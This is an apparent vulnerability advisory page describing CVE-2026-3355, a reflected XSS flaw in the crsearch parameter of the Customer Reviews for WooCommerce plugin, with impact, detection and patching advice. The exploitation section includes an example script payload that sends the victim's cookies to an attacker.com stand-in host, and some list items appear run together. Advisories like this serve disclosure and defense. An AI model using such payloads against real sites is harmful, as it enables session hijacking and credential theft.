
Cloud Vulnerability DB
A community-led vulnerabilities database
CVE-2026-3355 is a Reflected Cross-Site Scripting (XSS) vulnerability in the Customer Reviews for WooCommerce plugin for WordPress, affecting all versions up to and including 5.101.0. The flaw exists in the crsearch parameter due to insufficient input sanitization and output escaping, allowing unauthenticated attackers to inject arbitrary web scripts that execute in a victim's browser when they click a crafted link. It was published on April 16, 2026, and assigned a CVSS v3.1 base score of 6.1 (Medium) (GitHub Advisory, Wordfence).
The root cause is classified as CWE-79 (Improper Neutralization of Input During Web Page Generation — Cross-site Scripting). The crsearch parameter, used in the plugin's customer review search functionality, fails to properly sanitize user-supplied input before rendering it in the page output, enabling script injection via a reflected attack vector. Exploitation requires no authentication or special privileges, but does require user interaction — specifically, a victim must click a maliciously crafted URL containing the injected payload. The patch was applied in changeset 3472287 of the plugin's SVN repository (GitHub Advisory, WordPress SVN).
Successful exploitation allows an attacker to execute arbitrary JavaScript in the context of the victim's browser session on the affected WordPress site. This can result in theft of session cookies, credential harvesting, redirection to malicious sites, malware distribution, or partial defacement of the site as seen by the victim. Because the scope is changed (S:C in CVSS), the injected script can affect resources beyond the vulnerable component itself, though availability is not directly impacted (GitHub Advisory, Wordfence).
No public proof-of-concept exploit code has been observed, and there is no evidence of active in-the-wild exploitation as of the time of disclosure (Wordfence). The EPSS score is approximately 0.018–0.028%, placing it in a low-probability exploitation tier (GitHub Advisory). The vulnerability is not listed in the CISA Known Exploited Vulnerabilities (KEV) catalog. No threat actor attribution has been reported.
crsearch parameter, e.g., https://target-site.com/?crsearch=<script>document.location='https://attacker.com/steal?c='+document.cookie</script>.crsearch value, causing the injected JavaScript to execute in the victim's browser, potentially exfiltrating session cookies or performing actions on behalf of the victim (GitHub Advisory, Wordfence).crsearch parameter with encoded script tags or JavaScript event handlers (e.g., <script>, onerror=, javascript:) in the query string; outbound requests from victim browsers to unknown external domains shortly after visiting a WordPress page.crsearch parameter, such as URL-encoded <script> tags or HTML event attributes; referrer headers pointing to external phishing pages.Update the Customer Reviews for WooCommerce plugin to a version beyond 5.101.0, which includes the fix applied in SVN changeset 3472287 (WordPress SVN). If immediate patching is not feasible, consider temporarily disabling the plugin to eliminate the attack surface. As an additional layer of defense, deploy a Web Application Firewall (WAF) with rules to filter malicious input in the crsearch parameter, and train users to avoid clicking unsolicited or suspicious links (Wordfence).
Wordfence, which discovered and reported the vulnerability, included it in their weekly WordPress vulnerability report for April 13–19, 2026, and Sucuri referenced it in their April 2026 vulnerability patch roundup (Wordfence Blog, Sucuri Blog). No significant broader media coverage or notable researcher commentary beyond standard vulnerability disclosure channels has been observed.
Source: This report was generated using AI
Free Vulnerability Assessment
Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.
Get a personalized demo
"Best User Experience I have ever seen, provides full visibility to cloud workloads."
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
"We know that if Wiz identifies something as critical, it actually is."